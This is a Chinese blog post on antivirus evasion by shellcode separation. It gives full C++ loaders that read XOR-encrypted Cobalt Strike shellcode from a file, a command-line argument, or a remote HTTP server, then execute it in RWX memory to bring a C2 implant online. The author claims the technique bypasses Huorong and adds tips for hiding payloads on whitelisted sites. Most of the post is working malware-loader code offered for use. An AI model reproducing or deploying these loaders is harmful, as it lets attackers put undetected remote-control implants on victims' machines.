免杀-Shellcode分离隐藏&C++

最新推荐文章于 2025-04-07 08:00:00 发布
最新推荐文章于 2025-04-07 08:00:00 发布
阅读量2.7k 收藏 33
点赞数 30
文章标签: c++ 算法 开发语言 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45087791/article/details/136248400
版权

Shellcode分离隐藏-让杀毒找不到

内存免杀

内存免杀是将shellcode直接加载进内存,由于没有文件落地,因此可以绕过文件扫描策略的查杀。为了使内存免杀的效果更好,在申请内存时一般采用渐进式申请一块可读写内存,在运行时改为可执行,在执行的时候遵循分离免杀的思想。分离免杀包含对特征和行为的分离两个维度,把shellcode从放在程序转移到加载进内存,把整块的ShellCode通过分块传输的方法上传然后再拼接,这些体现了基本的"分离"思想。

➢C2远控-ShellCode分离-C/C++从文本中提取

加载器直接加载代码中的shellcode进行上线
加载器加载本地文件(图片、文本)读取数据=shellcode进行上线

目录2个文件:xxxx.exe xxx.bin
可升级:混淆加密xxx.bin,读取后进行解密执行

1、运行如下代码生成exe

#include<Windows.h>
#include <stdio.h>
#include <fstream>
#include<iostream>
using namespace std;

void load(char* buf, int shellcode_size)
{
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄

    char* shellcode = (char*)VirtualAlloc(
        NULL,
        shellcode_size,
        MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    CopyMemory(shellcode, buf, shellcode_size);
    //CreateThread函数,创建线程
    hThread = CreateThread(
        NULL, // 安全描述符
        NULL, // 栈的大小
        (LPTHREAD_START_ROUTINE)shellcode, // 函数
        NULL, // 参数
        NULL, // 线程标志
        &dwThreadId // 若成功,接收新创建的线程的线程ID DWORD变量的地址。
    );
    //通过调用 WaitForSingleObject 函数来监视事件状态,当事件设置为终止状态(WaitForSingleObject 返回 WAIT_OBJECT_0)时,每个线程都将自行终止执行。
    WaitForSingleObject(hThread, INFINITE); // 一直等待线程执行结束
}
int wmain(int argc, char* argv[])
{
    char filename[] = "p64.bin";
    // 以读模式打开文件
    ifstream infile;
    //以二进制方式打开
    infile.open(filename, ios::out | ios::binary);
    infile.seekg(0, infile.end); //追溯到流的尾部
    int length = infile.tellg(); //获取流的长度
    infile.seekg(0, infile.beg);//回溯到流头部

    char* data = new char[length]; //存取文件内容
    if (infile.is_open()) {
        cout << "reading from the file" << endl;
        infile.read(data, length);
    }
    cout << "size of data =" << sizeof(data) << endl;
    cout << "size of file =" << length << endl;
    for (int i = 0; i < length; i++)
    {
        printf("\\%x ", data[i]);
    }

    for (int i = 0; i < length; i++)
    {
        data[i] ^= 0x39;
    }

    int shellcode_size = length;
    load(data, shellcode_size);
    //加载成功并不会输出,推测load函数新创建的线程执行结束后,主进程也终止了。
    cout << "加载成功";
    return 0;
}

2、cs生成p64.bin shellcode文件 把两个文件放在同一个目录运行,shellocode进行0x39异或加密

➢C2远控-ShellCode分离-C/C++从参数中提取

加载器直接加载代码中的shellcode进行上线
接受执行文件后续的参数作文shellcode

#include<Windows.h>
#include <stdio.h>
#include <fstream>
#include<iostream>
using namespace std;

void load(char* buf, int shellcode_size)
{
    DWORD dwThreadId; // 线程ID
    HANDLE hThread; // 线程句柄

    char* shellcode = (char*)VirtualAlloc(
        NULL,
        shellcode_size,
        MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    CopyMemory(shellcode, buf, shellcode_size);
    //CreateThread函数,创建线程
    hThread = CreateThread(
        NULL, // 安全描述符
        NULL, // 栈的大小
        (LPTHREAD_START_ROUTINE)shellcode, // 函数
        NULL, // 参数
        NULL, // 线程标志
        &dwThreadId // 若成功,接收新创建的线程的线程ID DWORD变量的地址。
    );
    //通过调用 WaitForSingleObject 函数来监视事件状态,当事件设置为终止状态(WaitForSingleObject 返回 WAIT_OBJECT_0)时,每个线程都将自行终止执行。
    WaitForSingleObject(hThread, INFINITE); // 一直等待线程执行结束
}
int wmain(int argc, char* argv[])
{
    int len = strlen(argv[1]);
    char* filename = new char[len + 1];
    strcpy(filename, argv[1]);

    //参数发送的文件名读取 发送的数据流

    // 以读模式打开文件
    ifstream infile;
    //以二进制方式打开
    infile.open(filename, ios::out | ios::binary);
    infile.seekg(0, infile.end); //追溯到流的尾部
    int length = infile.tellg(); //获取流的长度
    infile.seekg(0, infile.beg);//回溯到流头部

    char* data = new char[length]; //存取文件内容
    if (infile.is_open()) {
        cout << "reading from the file" << endl;
        infile.read(data, length);
    }
    cout << "size of data =" << sizeof(data) << endl;
    cout << "size of file =" << length << endl;
    for (int i = 0; i < length; i++)
    {
        printf("\\%x ", data[i]);
    } 

    for (int i = 0; i < length; i++)
    {
        data[i] ^= 0x39;
    }

    int shellcode_size = length;
    load(data, shellcode_size);
    //加载成功并不会输出,推测load函数新创建的线程执行结束后,主进程也终止了。
    cout << "加载成功";
    return 0;
}

shellcode文件进行0x39异或加密
在这里插入图片描述

在cmd执行命令:xxxx.exe shellcode 文件发现可以上线,可以绕过火绒

可升级:xxxx.exe shellcode password

➢C2远控-ShellCode分离-C/C++从网站中提取

加载器直接加载代码中的shellcode进行上线
加载器加载访问网站(web http协议)获取数据=shellcode进行上线
1、请求获取到数据(shellcode)

2、shellcode进行调用执行

1、首先用cs生成c的shellcode文件, 将shellcode转换成十进制,代码如下

#include<Windows.h>
#include <stdio.h>




//将shellcode转换成10机制
unsigned char buf[] = "这里放shellcode";



int main()
{
	int shellcode_size = sizeof(buf);
	printf("shellcodesize=%d \n", shellcode_size);
	for (int i = 0; i < shellcode_size; i++) {
	
		printf("%d,", buf[i]);
	
	}

}

2、再kali中启动服务端,将生成的10进制文件放在aaaaa.txt文件中
在这里插入图片描述

3、生成文件,并运行发现可以上线

#include <string>
#include <windows.h>
#include <winhttp.h>
#include<iostream>
#include "file.cpp"
#pragma comment(lib, "winhttp.lib")

using namespace std;

char* WinGet(char* ip, int port, char* url)
{

	HINTERNET hSession = NULL;
	HINTERNET hConnect = NULL;
	HINTERNET hRequest = NULL;

	//************ 将char转换为wchar_t *****************/
	int ipSize;
	wchar_t* ip_wchar;
	//返回接受字符串所需缓冲区的大小,已经包含字符结尾符'\0'
	ipSize = MultiByteToWideChar(CP_ACP, 0, ip, -1, NULL, 0); //iSize =wcslen(pwsUnicode)+1=6
	ip_wchar = (wchar_t*)malloc(ipSize * sizeof(wchar_t)); //不需要 pwszUnicode = (wchar_t *)malloc((iSize+1)*sizeof(wchar_t))
	MultiByteToWideChar(CP_ACP, 0, ip, -1, ip_wchar, ipSize);

	int urlSize;
	wchar_t* url_wchar;
	//返回接受字符串所需缓冲区的大小,已经包含字符结尾符'\0'
	urlSize = MultiByteToWideChar(CP_ACP, 0, url, -1, NULL, 0); //iSize =wcslen(pwsUnicode)+1=6
	url_wchar = (wchar_t*)malloc(urlSize * sizeof(wchar_t)); //不需要 pwszUnicode = (wchar_t *)malloc((iSize+1)*sizeof(wchar_t))
	MultiByteToWideChar(CP_ACP, 0, url, -1, url_wchar, urlSize);
	//************ ********************************* *****************/


	//port = 80; //默认端口

	//1. 初始化一个WinHTTP-session句柄,参数1为此句柄的名称
	hSession = WinHttpOpen(L"WinHTTP Example/1.0",
		WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
		WINHTTP_NO_PROXY_NAME,
		WINHTTP_NO_PROXY_BYPASS, 0);

	if (hSession == NULL) {
		cout << "Error:Open session failed: " << GetLastError() << endl;
		exit(0);
	}

	//2. 通过上述句柄连接到服务器,需要指定服务器IP和端口号 INTERNET_DEFAULT_HTTP_PORT:80。若连接成功,返回的hConnect句柄不为NULL
	hConnect = WinHttpConnect(hSession, ip_wchar, port, 0);
	if (hConnect == NULL) {
		cout << "Error:Connect failed: " << GetLastError() << endl;
		exit(0);
	}

	//3. 通过hConnect句柄创建一个hRequest句柄,用于发送数据与读取从服务器返回的数据。
	hRequest = WinHttpOpenRequest(hConnect, L"GET", url_wchar, NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
	//其中参数2表示请求方式,此处为Get;参数3:给定Get的具体地址,如这里的具体地址为https://www.citext.cn/GetTime.php
	if (hRequest == NULL) {
		cout << "Error:OpenRequest failed: " << GetLastError() << endl;
		exit(0);
	}

	BOOL bResults;
	//发送请求
	bResults = WinHttpSendRequest(hRequest,
		WINHTTP_NO_ADDITIONAL_HEADERS,
		0, WINHTTP_NO_REQUEST_DATA, 0,
		0, 0);

	if (!bResults) {
		cout << "Error:SendRequest failed: " << GetLastError() << endl;
		exit(0);
	}
	else {
		//(3) 发送请求成功则准备接受服务器的response。注意:在使用 WinHttpQueryDataAvailable和WinHttpReadData前必须使用WinHttpReceiveResponse才能access服务器返回的数据
		bResults = WinHttpReceiveResponse(hRequest, NULL);
	}


	LPVOID lpHeaderBuffer = NULL;
	DWORD dwSize = 0;
	//4-3. 获取服务器返回数据
	LPSTR pszOutBuffer = NULL;
	DWORD dwDownloaded = 0;         //实际收取的字符数
	wchar_t* pwText = NULL;
	if (bResults)
	{
		do
		{
			//(1) 获取返回数据的大小(以字节为单位)
			dwSize = 0;
			if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) {
				cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
				break;
			}
			if (!dwSize)    break;  //数据大小为0                

			//(2) 根据返回数据的长度为buffer申请内存空间
			pszOutBuffer = new char[dwSize + 1];
			if (!pszOutBuffer) {
				cout << "Out of memory." << endl;
				break;
			}
			ZeroMemory(pszOutBuffer, dwSize + 1);       //将buffer置0

			//(3) 通过WinHttpReadData读取服务器的返回数据
			if (!WinHttpReadData(hRequest, pszOutBuffer, dwSize, &dwDownloaded)) {
				cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
			}
			if (!dwDownloaded)
				break;


		} while (dwSize > 0);
		//4-4. 将返回数据转换成UTF8
		DWORD dwNum = MultiByteToWideChar(CP_ACP, 0, pszOutBuffer, -1, NULL, 0);    //返回原始ASCII码的字符数目       
		pwText = new wchar_t[dwNum];                                                //根据ASCII码的字符数分配UTF8的空间
		MultiByteToWideChar(CP_UTF8, 0, pszOutBuffer, -1, pwText, dwNum);           //将ASCII码转换成UTF8
		//printf("\n返回数据为:\n%S\n\n", pwText);


	}

	//5. 依次关闭request,connect,session句柄
	if (hRequest) WinHttpCloseHandle(hRequest);
	if (hConnect) WinHttpCloseHandle(hConnect);
	if (hSession) WinHttpCloseHandle(hSession);

	/******************   将wchar转换为char  *******************/
	int iSize;
	char* data;

	//返回接受字符串所需缓冲区的大小,已经包含字符结尾符'\0'
	iSize = WideCharToMultiByte(CP_ACP, 0, pwText, -1, NULL, 0, NULL, NULL); //iSize =wcslen(pwsUnicode)+1=6
	data = (char*)malloc(iSize * sizeof(char)); //不需要 pszMultiByte = (char*)malloc(iSize*sizeof(char)+1);
	WideCharToMultiByte(CP_ACP, 0, pwText, -1, data, iSize, NULL, NULL);
	return data;
}




char* StrToShellcode(char str[])
{
	char buf[2048];
	const char s[2] = ",";
	char* token;
	int i = 0;
	/* 获取第一个子字符串 */
	token = strtok(str, s);
	//buf[i] = char(stoi(token)); 
	/* 继续获取其他的子字符串 */
	while (token != NULL) {

		buf[i] = char(stoi(token)); //stoi函数将字符串转换整数
		printf("%s  %d\n", token, i);
		printf("%x\n", stoi(token));
		token = strtok(NULL, s);
		i++;
	}
	load(buf, 2048);  //晕了,指针传参回主函数不会了,先在这加载了
	return buf;
}
int main(int argc, char* argv[])
{
	char* data;

	const char ip[16] = "www.aliyun.com";
	char* ips = const_cast<char*>(ip);

	const char url[11] = "aaaaa.txt";
	char* urls = const_cast<char*>(url);

	data = WinGet(ips, 8888, urls);
	cout << "返回的数据为: " << data << endl;

	//执行shellcode
	char* buf = StrToShellcode(data);

	cout << argc;
	if (argc > 2) {  //命令行参数大于两个时才加载
		char* buf = StrToShellcode(data);
	}
}

url:http://xx.xx.xx.xx/sc.txt
可升级:
1、可以在绿标白名单的网站上找一个存储路径充当
2、将shellcode的十进制代码进行混淆

➢C2远控-ShellCode分离-C/C++从管道中提取

(查杀特征大,不建议使用)
1、client客户端去发送shellcode给server服务端
2、server服务端去接受到shellcode进行加载上线

*socket,pipe等技术 *
利用建立网络通讯管道,在发送ShellCode接受执行
可升级:可以在发送过程中进行混淆加密,接受后进行解密执行

补充:

编辑器设置 VS绕过360QVM,VT全绿
https://mp.weixin.qq.com/s/UJlVvagNjmy9E-B-XjBHyw
编译器差异 G++ GCC
https://blog.youkuaiyun.com/weixin_41012767/article/details/129365597

shellcode 其他
代码审计
05-18 406
https://blog.youkuaiyun.com/qq_36241198/article/details/119846882?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165285461216781432947947%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=165285461216781432947947&biz_id=0&
实战shell&C2远控&工具魔改(日记 - 上篇)
guanjian_ci的博客
06-05 7230
1、上面实验内容并不多,但是工具的使用、环境的安装、代码的排错够新手玩上几天了。2、绕过毒软件的本质就是防止被毒库匹配,代码、工具指纹等等!3、一个好的,一定具备了多方面的性能:防软、绕过流量平台、防沙箱、防逆向调试后依然能够正常运行上线!4、此文章分上 、 中 、下,未完待续... ...
Shellcode分离加载实现的两种方式(VT率:1/68)
xf555er的博客
05-24 3222
本文详细介绍了如何通过文件加载和远程URL加载方式实现Shellcode分离加载,以规避安全软件的检测。文章首先描述了通过Metasploit Framework生成的shellcode文件加载的过程,并提供了相关的C++代码。为了避毒软件检测,利用动态API调用和lazy_importer项目进行代码优化。其次,文章讨论了如何通过远程URL加载shellcode,也提供了相应的实现代码。
内存技术分析:原理、方法与实战应用
最新发布
syg6921008的博客
04-07 1105
内存代表了攻防技术的集大成者,它将加密算法、内核原理、操作系统行为、线程模型、模块结构、执行逻辑伪装融为一体,形成真正意义上的多维立体隐匿技术。这是对现代EDR架构的深度挑战,也是对安全工程师知识体系的极限拷问。未来,随着硬件安全模块、行为追踪引擎和 AI 模型加速部署,内存将成为持久控制、无文件攻击与多态演化的必备核心技术之一。“能被看见的攻击,才值得被防御;真正的,从未暴露。愿每一位隐匿于内存深处的研究者,都能以极致之术,行无痕之道。
Shellcode对抗(C/C++)
热门推荐
qq_74806534的博客
02-17 2万+
这里便是毒软件毒的原理,这就是特征,我们只需要将木马程序进行简单的分析,就能得到shell回连的IP地址和端口,如果毒软件发现我们的可执行文件是一个木马程序。加载器的作用:由于shellcode是一段可以执行的二进制代码,因此需要开辟出一段可以读写可操作的地址来运行shellcode,而这就是加载器的作用。之后打开.c文件是一个未编译代码,放到上文的编译代码中,注意这里是x64编译,用的方式三,使用.c文件。因为我们的加载器的特征,各平台毒软件都有了已经,所有我们就要用新的,特征没有被锁定。
Python shellcode
qq_25761407的博客
04-02 5800
Python shellcode
shellCode技巧
qq_39330735的博客
05-15 2923
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对毒软件的⼀种⽅法,但是由于与⼿法的定义 有出⼊,所以如果将国内技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视 ,在类似于技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论技术,这为以后⽊⻢ 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
ShellCode的一些方法
qq_68890680的博客
06-26 742
申请内存空间:VirtualAlloc(在调用进程的虚拟地址空间中保留、提交或更改页面区域的状态分配的内存初始化为零)、VirtualAlloc2(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。该函数将其分配的内存初始化为零)、VirtualAllocEx(进程注入:在指定进程的虚拟地址空间内保留、提交或更改内存区域的状态。常见的加密解密方式:AES加密、hex加密、XOR+base64加密、Base85+XOR+RC4。加载方式:基础加载,纤程加载,远程加载。
GoPass系列基础(一)_go语言
2401_89820465的博客
01-11 416
Shellcode 是可执行的 16 进制机器码,需要执行的话它就需要用到 Shellcode 加载器。Shellcode 加载器的主要功能:开辟内存空间–将 Shellcode 放入内存空间–指针指向 Shellcode 地址执行。以 Goby 的 GoPassPython 插件来说:这个是用 Python 语言作为 Shellcode 的加载器执行 Shellcode 的,它的步骤:开辟空间–写入内存空间–然后执行。可以尝试放入自己的 Shellcode 执行一下。
红队搬运工-github有趣的项目分享
Gamma_lab的博客
03-17 1971
前言: ​ github一直是it行业最大的同性交流网站,上面的开源好项目非常之多,不少的渗透好工具都出自github上面的大佬,尤其是的loader,github一直是好的藏宝阁,拿来就能用,拿来就能,除非被软标记很多的项目,大部分效果都很好的。 分享: 1.DPlant github链接:https://github.com/trickster0/UDPlant 介绍:UDP版本的反向shell工具,在 windows 和 linux 中都能完美运行 开发语言:rust 推荐理由:rus
开发知识点-C++之win32与NT内核
aming小老弟
03-07 792
VC++远控编程班www.zygx8.com 61201860605658096586599275746120931930648561639269 123。红队专题-从零开始VC++C/S远程控制软件RAT-MFC-VC驿站VIP之C++远控班bbs.176ku.com费看。IShellExtInit接口初始化shell扩展。老狼GHOST内核编程全套。
绕过AV:shellcode加载器
03-04
旁路AV 条件触发式远控VT 6/70国内软及后卫,卡巴斯基等主流软 原理 使用 将shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以正常使用时此网页需要可以访问)编译:go build -ldflags =“-w -s -H = windowsgui”
万字渗透测试入门知识点,自学查漏补缺
yjwangan的博客
10-24 1231
万字渗透测试入门知识点,自学查漏补缺
[ShellCode] 动态解密 ShellCode
LYSM
11-27 2363
背景 今天在复习《加密与解密》时,在软件保护这一章中有一个代码与数据结合的案例,其原理是将代码段中的代码进行xor异或加密处理以后回写到原始位置,当程序运行后将此处的内容动态的进行解密,解密后回写替换回原始内存位置,这样就能实现内存加载。 由此案例我想到一个关于的利用思路,首先软的运作方式多数为特征码查,当我们程序中使用了敏感的函数时,就会存在被的风险,而如果将代码段中的代码进行加密,需要时直接在内存中解密,那么软将无法捕捉硬盘文件的特征,从而可以规避软针对硬盘特征的查手法。 经过阅读该案例
入门---shellcode
LvHLong的博客
05-03 5891
前言 本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 基础概念 技术全称为反毒技术Anti Anti- Virus简称“”,它指的是一种能使病毒木马于被毒软件查的技术。 毒软件工作原理 市面上的毒软件基本由扫描器、病毒特征库和虚拟机组成,它会把文件放在虚拟机内运行,扫描该文件的特征,包括静态特征、内存特征、行为特征等,通过和病毒特征库对比来判断一个文件是否为恶意文件。安全厂商一直在收集市面上出现的...
C++
weixin_33866037的博客
10-31 402
假设我们的特征码定位在MessageBoxA函数的地址(只是举个例子,一般这个函数不会被,其他函数也类似方法)那么我们到源码里面发现,我们在PrintMsg函数中调用了这个API函数,那么我们就要对他进行处理。对于输入表被查我们一般的处理方法是修改函数的调用方式,比如采用dll动态调用,通过上图,我们知道我们是以非unicode方式编译的MessageBox,他对应的非Unicode的函数为M...
Shellcode,过360、火绒、windows-Defender
Kris__zhang的博客
03-17 2634
快速生成文件,过360、火绒、windows-Defender
shellcode
土豆的博客
07-14 2107
0x06利用wmic远程文件不落地执行shellcode 1、msf生成的hta链接放入hta.xsl文件中,(其中JScript调用mshta运行恶意hta),并将文件放置攻击方服务器 <?xml version='1.0'?> <stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" ..
msf shellcode分离技术
总有人间一两风,填我十万八千梦
05-27 2078
一般的shellcode是直接放在程序里面执行,分离是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf shellcode分离
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值